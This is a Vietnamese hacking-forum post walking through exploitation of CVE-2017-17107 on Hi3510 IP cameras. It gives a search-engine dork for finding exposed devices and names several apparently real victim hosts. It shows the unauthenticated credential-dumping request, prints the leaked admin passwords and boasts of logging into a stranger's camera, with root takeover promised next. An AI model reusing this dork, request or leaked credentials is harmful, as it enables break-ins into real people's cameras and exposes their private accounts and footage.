Khai thác lỗi Camera CVE: CVE-2017-17107

Discussion in 'Exploits & Vulnerabilities' started by admin, Feb 21, 2018.

 1. admin

  admin Administrator Staff Member

  Xin chào các bạn hôm nay mình có thấy một lỗi CVE liên quan tới camera IP khá nghiêm trọng được công bố nên cũng vọc thử xem sao xem có hack được gì không

  Đầu tiên là google dork cái này do mình tự chế

  inurl:"/web/cgi-bin/hi3510/"

  Sau khi dùng dork trên thì chúng ta có thể thấy một loạt kết quả trả về vào link bất kỳ nào đó

  http://botoft01.dyndns-home.com:8006
  http://leslarmesdelaruche.ddns.net
  http://remote.nisseringen-mc.dk:50051

  sau đó sửa lại link victim thành
  victim.com//web/cgi-bin/hi3510/param.cgi?cmd=getuser

  http://botoft01.dyndns-home.com:8006/web/cgi-bin/hi3510/param.cgi?cmd=getuser
  http://leslarmesdelaruche.ddns.net/web/cgi-bin/hi3510/param.cgi?cmd=getuser

  Chúng ta thu được một số thông tin nhạy cảm về tài khoản admin

  PHP:
  var name0="admin"; var password0="HPKhJdE1"; var authLevel0="255"; var name1="guest"; var password1="guest"; var authLevel1="3"; var name2=""; var password2=""; var authLevel2="3"; var name3=""; var password3=""; var authLevel3="3"; var name4=""; var password4=""; var authLevel4="3"; var name5=""; var password5=""; var authLevel5="3"; var name6=""; var password6=""; var authLevel6="3"; var name7=""; var password7=""; var authLevel7="3"; var name8=""; var password8=""; var authLevel8="0"; var name9=""; var password9=""; var authLevel9="0";
  PHP:

  var name0="admin"; var password0="Ruk5zy4j1"; var authLevel0="255"; var name1="botoft"; var password1="Marianne1"; var authLevel1="3"; var name2=""; var password2=""; var authLevel2="3"; var name3=""; var password3=""; var authLevel3="3"; var name4=""; var password4=""; var authLevel4="3"; var name5=""; var password5=""; var authLevel5="3"; var name6=""; var password6=""; var authLevel6="3"; var name7=""; var password7=""; var authLevel7="3"; var name8=""; var password8=""; var authLevel8="0"; var name9=""; var password9=""; var authLevel9="0";

  Chúng ta hú ý tới thông tin admin đã bị lộ

  var name0="admin"; var password0="Ruk5zy4j1"
  Tiến hành đột nhập một anh xem sao
  [​IMG]

  [​IMG]


  Vậy là đã đăng nhập thành công vào admin của nó rồi

  Phần tiếp theo mình sẽ hướng dẫn các bạn chiếm tài khoản root của nó :) chiếm luôn con IP camera này :D

  Last edited: Dec 14, 2017
  [email protected]
  My PGP key: https://goo.gl/triziq
   

Share This Page